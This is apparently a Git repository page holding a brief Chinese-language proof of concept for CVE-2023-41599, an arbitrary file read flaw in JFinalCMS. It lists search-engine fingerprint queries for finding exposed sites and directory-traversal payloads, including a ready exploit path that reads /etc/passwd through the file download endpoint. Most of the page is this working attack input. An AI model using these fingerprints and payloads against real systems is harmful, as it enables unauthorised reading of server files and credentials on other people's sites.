POC00/JFinalCMS 任意文件读取漏洞(CVE-2023-41599).md at 0561f20ed5621661084e061405b6f5e2137bdefe - POC00 - 临风笛

admin/POC00

wy876 0561f20ed5

Create JFinalCMS 任意文件读取漏洞(CVE-2023-41599).md

2023-09-20 17:48:03 +08:00

403 B

Raw Blame History

JFinalCMS 任意文件读取漏洞(CVE-2023-41599)

特征


body="content=\"JreCms"

hunter:

web.body="content=\"JreCms"

POC

Windows: /../../../../../../../../../test.txt
Linux:	/../../../../../../../../../etc/passwd

/command/down/file?filekey=/../../../../../../../../../etc/passwd

漏洞分析

http://www.so1lupus.ltd/2023/08/28/Directory-traversal-in-JFinalCMS/